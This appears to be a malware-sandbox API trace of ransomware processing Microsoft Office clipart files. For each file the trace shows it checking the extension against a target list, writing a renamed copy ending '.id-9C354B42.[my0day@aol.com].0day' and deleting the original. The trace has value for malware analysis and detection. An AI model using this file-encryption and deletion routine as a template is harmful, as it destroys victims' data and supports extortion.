lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0270.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0270.547] lstrlenW (lpString=".doc") returned 4 [0270.547] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.547] lstrlenW (lpString=".docx") returned 5 [0270.547] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.547] lstrlenW (lpString=".pdf") returned 4 [0270.547] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.547] lstrlenW (lpString=".xls") returned 4 [0270.547] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.547] lstrlenW (lpString=".xlsx") returned 5 [0270.547] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.547] lstrlenW (lpString=".ppt") returned 4 [0270.547] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0270.547] lstrlenW (lpString=".zip") returned 4 [0270.547] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.547] lstrlenW (lpString=".rar") returned 4 [0270.547] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.547] lstrlenW (lpString=".bz2") returned 4 [0270.547] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.547] lstrlenW (lpString=".7z") returned 3 [0270.547] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0270.547] lstrlenW (lpString=".dbf") returned 4 [0270.547] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0270.547] lstrlenW (lpString=".1cd") returned 4 [0270.547] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0270.548] lstrlenW (lpString=".jpg") returned 4 [0270.548] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0270.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0270.548] lstrlenW (lpString=".doc") returned 4 [0270.548] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.548] lstrlenW (lpString=".docx") returned 5 [0270.548] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.548] lstrlenW (lpString=".pdf") returned 4 [0270.548] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.548] lstrlenW (lpString=".xls") returned 4 [0270.548] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.548] lstrlenW (lpString=".xlsx") returned 5 [0270.548] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.548] lstrlenW (lpString=".ppt") returned 4 [0270.548] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0270.548] lstrlenW (lpString=".zip") returned 4 [0270.548] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.548] lstrlenW (lpString=".rar") returned 4 [0270.548] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.548] lstrlenW (lpString=".bz2") returned 4 [0270.548] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.548] lstrlenW (lpString=".7z") returned 3 [0270.548] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0270.548] lstrlenW (lpString=".dbf") returned 4 [0270.548] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0270.549] lstrlenW (lpString=".1cd") returned 4 [0270.549] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0270.549] lstrlenW (lpString=".jpg") returned 4 [0270.549] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.549] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.549] lstrlenW (lpString="BL00932_.WMF") returned 12 [0270.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0270.549] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=19476) returned 1 [0270.549] CloseHandle (hObject=0x398) returned 1 [0270.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf")) returned 0x20 [0270.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0270.550] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.550] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.550] GetLastError () returned 0x0 [0270.550] ReadFile (in: hFile=0x398, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x4c14, lpOverlapped=0x0) returned 1 [0270.552] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x4c20, lpOverlapped=0x0) returned 1 [0270.554] ReadFile (in: hFile=0x398, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0270.554] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.554] SetEndOfFile (hFile=0x380) returned 1 [0270.554] CloseHandle (hObject=0x380) returned 1 [0270.554] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.554] SetEndOfFile (hFile=0x398) returned 1 [0270.558] CloseHandle (hObject=0x398) returned 1 [0270.558] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.558] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf")) returned 1 [0270.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0270.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0270.558] lstrlenW (lpString=".doc") returned 4 [0270.558] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.558] lstrlenW (lpString=".docx") returned 5 [0270.558] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.558] lstrlenW (lpString=".pdf") returned 4 [0270.558] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.558] lstrlenW (lpString=".xls") returned 4 [0270.558] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.558] lstrlenW (lpString=".xlsx") returned 5 [0270.559] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.559] lstrlenW (lpString=".ppt") returned 4 [0270.559] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0270.559] lstrlenW (lpString=".zip") returned 4 [0270.559] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.559] lstrlenW (lpString=".rar") returned 4 [0270.559] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.559] lstrlenW (lpString=".bz2") returned 4 [0270.559] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.559] lstrlenW (lpString=".7z") returned 3 [0270.559] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0270.559] lstrlenW (lpString=".dbf") returned 4 [0270.559] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0270.559] lstrlenW (lpString=".1cd") returned 4 [0270.559] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0270.559] lstrlenW (lpString=".jpg") returned 4 [0270.559] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0270.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0270.559] lstrlenW (lpString=".doc") returned 4 [0270.559] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.559] lstrlenW (lpString=".docx") returned 5 [0270.559] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.559] lstrlenW (lpString=".pdf") returned 4 [0270.560] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.560] lstrlenW (lpString=".xls") returned 4 [0270.560] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.560] lstrlenW (lpString=".xlsx") returned 5 [0270.560] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.560] lstrlenW (lpString=".ppt") returned 4 [0270.560] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0270.560] lstrlenW (lpString=".zip") returned 4 [0270.560] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.560] lstrlenW (lpString=".rar") returned 4 [0270.560] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.560] lstrlenW (lpString=".bz2") returned 4 [0270.560] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.560] lstrlenW (lpString=".7z") returned 3 [0270.560] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0270.560] lstrlenW (lpString=".dbf") returned 4 [0270.560] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0270.560] lstrlenW (lpString=".1cd") returned 4 [0270.560] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0270.560] lstrlenW (lpString=".jpg") returned 4 [0270.560] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.560] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.561] lstrlenW (lpString="BL00985_.WMF") returned 12 [0270.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0270.561] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=3768) returned 1 [0270.561] CloseHandle (hObject=0x398) returned 1 [0270.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf")) returned 0x20 [0270.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0270.561] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.561] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.562] GetLastError () returned 0x0 [0270.562] ReadFile (in: hFile=0x398, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0xeb8, lpOverlapped=0x0) returned 1 [0270.563] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec0, lpOverlapped=0x0) returned 1 [0270.565] ReadFile (in: hFile=0x398, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0270.565] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.565] SetEndOfFile (hFile=0x380) returned 1 [0270.565] CloseHandle (hObject=0x380) returned 1 [0270.565] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.565] SetEndOfFile (hFile=0x398) returned 1 [0271.056] CloseHandle (hObject=0x398) returned 1 [0271.060] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.120] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf")) returned 1 [0271.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0271.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0271.120] lstrlenW (lpString=".doc") returned 4 [0271.120] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.120] lstrlenW (lpString=".docx") returned 5 [0271.120] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.120] lstrlenW (lpString=".pdf") returned 4 [0271.120] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.120] lstrlenW (lpString=".xls") returned 4 [0271.120] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.120] lstrlenW (lpString=".xlsx") returned 5 [0271.120] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.120] lstrlenW (lpString=".ppt") returned 4 [0271.120] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0271.120] lstrlenW (lpString=".zip") returned 4 [0271.121] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.121] lstrlenW (lpString=".rar") returned 4 [0271.121] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString=".bz2") returned 4 [0271.121] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString=".7z") returned 3 [0271.121] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0271.121] lstrlenW (lpString=".dbf") returned 4 [0271.121] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0271.121] lstrlenW (lpString=".1cd") returned 4 [0271.121] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0271.121] lstrlenW (lpString=".jpg") returned 4 [0271.121] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0271.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0271.121] lstrlenW (lpString=".doc") returned 4 [0271.121] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString=".docx") returned 5 [0271.121] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.121] lstrlenW (lpString=".pdf") returned 4 [0271.121] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString=".xls") returned 4 [0271.121] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.121] lstrlenW (lpString=".xlsx") returned 5 [0271.122] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.122] lstrlenW (lpString=".ppt") returned 4 [0271.122] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0271.122] lstrlenW (lpString=".zip") returned 4 [0271.122] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.122] lstrlenW (lpString=".rar") returned 4 [0271.122] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.122] lstrlenW (lpString=".bz2") returned 4 [0271.122] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.122] lstrlenW (lpString=".7z") returned 3 [0271.122] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0271.122] lstrlenW (lpString=".dbf") returned 4 [0271.122] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0271.122] lstrlenW (lpString=".1cd") returned 4 [0271.122] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0271.122] lstrlenW (lpString=".jpg") returned 4 [0271.122] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.122] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.122] lstrlenW (lpString="BS00439_.WMF") returned 12 [0271.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0271.125] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=2052) returned 1 [0271.125] CloseHandle (hObject=0x2c4) returned 1 [0271.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf")) returned 0x20 [0271.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0271.249] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.250] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.272] GetLastError () returned 0x0 [0271.272] ReadFile (in: hFile=0x38c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x804, lpOverlapped=0x0) returned 1 [0271.275] WriteFile (in: hFile=0x39c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x810, lpOverlapped=0x0) returned 1 [0271.277] ReadFile (in: hFile=0x38c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0271.277] WriteFile (in: hFile=0x39c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.277] SetEndOfFile (hFile=0x39c) returned 1 [0271.277] CloseHandle (hObject=0x39c) returned 1 [0271.277] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.277] SetEndOfFile (hFile=0x38c) returned 1 [0271.279] CloseHandle (hObject=0x38c) returned 1 [0271.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.307] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf")) returned 1 [0271.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0271.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0271.420] lstrlenW (lpString=".doc") returned 4 [0271.420] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.420] lstrlenW (lpString=".docx") returned 5 [0271.420] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.420] lstrlenW (lpString=".pdf") returned 4 [0271.420] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.420] lstrlenW (lpString=".xls") returned 4 [0271.420] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.420] lstrlenW (lpString=".xlsx") returned 5 [0271.420] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.420] lstrlenW (lpString=".ppt") returned 4 [0271.420] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 